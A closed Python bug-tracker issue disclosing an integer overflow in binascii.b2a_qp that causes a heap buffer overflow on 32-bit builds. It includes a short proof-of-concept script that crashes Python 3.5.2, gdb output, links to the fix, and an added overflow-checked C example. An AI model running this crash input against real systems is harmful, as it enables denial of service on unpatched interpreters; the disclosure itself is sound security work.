Issue 27760

This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

Classification
Title: integer overflow in binascii.b2a_qp
Type: security
Stage: resolved
Components: Library (Lib)
Versions: Python 3.6, Python 3.2, Python 3.3, Python 3.4, Python 3.5, Python 2.7

Process
Status: closed
Resolution: fixed
Dependencies:
Superseder:
Assigned To:
Nosy List: benjamin.peterson, python-dev, tehybel
Priority: normal
Keywords:

Created on 2016-08-14 01:32 by benjamin.peterson, last changed 2022-04-11 14:58 by admin. This issue is now closed.

Messages (3)
msg272634 - (view) Author: Benjamin Peterson (benjamin.peterson) * (Python committer) Date: 2016-08-14 01:32

Thomas E Hybel reports:

This vulnerability resides in /Modules/binascii.c in the function binascii_b2a_qp_impl. The problem is that the integer variable "odatalen" can overflow to become a small number.

The function binascii_b2a_qp_impl qp-encodes binary data. First it computes the output string's length in the variable "odatalen":

    /* First, scan to see how many characters need to be encoded */
    in = 0;
    while (in < datalen) {
        if ((databuf[in] > 126) || ... )
        {
            ...
            odatalen += 3;
            in++;
        }
        ...
    }

As we can see, each input character can result in more than three output characters. Then we allocate the output string:

    odata = (unsigned char *) PyMem_Malloc(odatalen);

And finally we encode the input string and write the result into odata.

If our string is so large that "odatalen" will wrap around and become a small number, then the odata buffer will be too small to hold the data. Our input is then copied into this too-small buffer. So the integer overflow results in a heap buffer overflow.

Here's a proof-of-concept script:

--- begin script ---
import binascii
binascii.b2a_qp(b"\x80"*0x531dec0e) # this number gives odatalen=2
--- end script ---

Note that this script assumes a 32-bit system where the "odatalen" variable will be 4 bytes wide.

When run on Python-3.5.2, 32-bits, we get a segfault:

(gdb) r ../poc3.py
Starting program: /home/ubuntu32/python3/Python-3.5.2/python ../poc3.py

Breakpoint 1, binascii_b2a_qp_impl (module=module@entry=0xb7c370f4, data=data@entry=0xbffff6e4, quotetabs=0x0, istext=0x1, header=0x0)
    at /home/ubuntu32/python3/Python-3.5.2/Modules/binascii.c:1448
1448        odata = (unsigned char *) PyMem_Malloc(odatalen);
(gdb) p odatalen
$27 = 0x2
(gdb) p datalen
$28 = 0x531dec0e
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xb7fd1f63 in to_hex (ch=0x80, s=s@entry=0x83c5fff "")
    at /home/ubuntu32/python3/Python-3.5.2/Modules/binascii.c:1333
1333        s[1] = "0123456789ABCDEF"[uvalue % 16];
(gdb) bt
#0  0xb7fd1f63 in to_hex (ch=0x80, s=s@entry=0x83c5fff "")
    at /home/ubuntu32/python3/Python-3.5.2/Modules/binascii.c:1333
#1  0xb7fd22fa in binascii_b2a_qp_impl (module=module@entry=0xb7c370f4, data=data@entry=0xbffff6e4, quotetabs=0x0, istext=0x1, header=0x0)
    at /home/ubuntu32/python3/Python-3.5.2/Modules/binascii.c:1476
#2  0xb7fd2510 in binascii_b2a_qp (module=module@entry=0xb7c370f4, args=args@entry=0xb7cbbb5c, kwargs=kwargs@entry=0x0)
    at /home/ubuntu32/python3/Python-3.5.2/Modules/clinic/binascii.c.h:510
#3  0x080e0ef4 in PyCFunction_Call (func=func@entry=0xb7c37534, args=args@entry=0xb7cbbb5c, kwds=kwds@entry=0x0)
    at Objects/methodobject.c:98
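The defensive shape the report implies, as an added example written for this page (not the CPython patch): the output-length scan with every increment checked against the counter's maximum, so an oversized input is rejected before PyMem_Malloc instead of yielding a too-small buffer. The counter type is deliberately a 32-bit int (an assumption, to model the 32-bit Py_ssize_t from the report on any host), and the byte classification is a simplified version of the loop shown above.

```c
#include <stddef.h>
#include <stdint.h>
#define MAXLINESIZE 76  /* quoted-printable line limit, as in binascii.c */

/* Output counter modelled as a 32-bit signed integer so the 32-bit
 * Py_ssize_t wraparound from the report can be exercised on any host. */
typedef int32_t len_t;
#define LEN_MAX INT32_MAX

/* Add delta to *len, or return -1 instead of wrapping around. */
static int add_checked(len_t *len, len_t delta) {
    if (*len > LEN_MAX - delta) return -1;
    *len += delta;
    return 0;
}

/* Simplified classification from the scan loop: bytes > 126, '=' and
 * control bytes other than TAB/LF take the 3-byte "=XX" form (CR handling
 * and the quotetabs/istext/header options are left out). */
static int needs_encoding(unsigned char c) {
    return c > 126 || c == '=' || (c < 32 && c != '\t' && c != '\n');
}

/* Scan one chunk, updating the running output length *odatalen and the
 * current line length *linelen so huge inputs can be fed in pieces. Returns
 * -1 as soon as the total would exceed LEN_MAX (caller must then fail). */
int qp_len_update(const unsigned char *buf, size_t n,
                  len_t *odatalen, len_t *linelen) {
    for (size_t in = 0; in < n; in++) {
        if (buf[in] == '\n') {                 /* hard line end */
            *linelen = 0;
            if (add_checked(odatalen, 1)) return -1;
            continue;
        }
        len_t width = needs_encoding(buf[in]) ? 3 : 1;
        if (*linelen + width >= MAXLINESIZE) { /* soft line break "=\n" */
            if (add_checked(odatalen, 2)) return -1;
            *linelen = 0;
        }
        if (add_checked(odatalen, width)) return -1;
        *linelen += width;
    }
    return 0;
}

/* Whole-buffer convenience: encoded length, or -1 on overflow. */
len_t qp_len(const unsigned char *buf, size_t n) {
    len_t odatalen = 0, linelen = 0;
    return qp_len_update(buf, n, &odatalen, &linelen) ? -1 : odatalen;
}
```

Because the state is explicit, the overflow path can be exercised by starting the counter near LEN_MAX instead of allocating gigabytes of input.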
msg272635 - (view) Author: Roundup Robot (python-dev) (Python triager) Date: 2016-08-14 01:37

New changeset af42635b5ed1 by Benjamin Peterson in branch '2.7':
fix possible integer overflow in binascii.b2a_qp (closes #27760)
https://hg.python.org/cpython/rev/af42635b5ed1

New changeset 54c74212db91 by Benjamin Peterson in branch '3.3':
fix possible integer overflow in binascii.b2a_qp (closes #27760)
https://hg.python.org/cpython/rev/54c74212db91

New changeset 9822bf4bcece by Benjamin Peterson in branch '3.4':
merge 3.3 (closes #27760)
https://hg.python.org/cpython/rev/9822bf4bcece

New changeset a277ab6bf66b by Benjamin Peterson in branch '3.5':
merge 3.4 (closes #27760)
https://hg.python.org/cpython/rev/a277ab6bf66b

New changeset 4a00d4ebf60f by Benjamin Peterson in branch 'default':
merge 3.5 (closes #27760)
https://hg.python.org/cpython/rev/4a00d4ebf60f
msg272661 - (view) Author: tehybel (tehybel) Date: 2016-08-14 10:10

The patch seems correct to me.
History

Date                 User               Action   Args
2022-04-11 14:58:34  admin              set      github: 71947
2016-08-14 10:10:45  tehybel            set      nosy: +tehybel; messages: +msg272661
2016-08-14 01:37:35  python-dev         set      status: open -> closed; nosy: +python-dev; messages: +msg272635; resolution: fixed; stage: resolved
2016-08-14 01:32:26  benjamin.peterson  create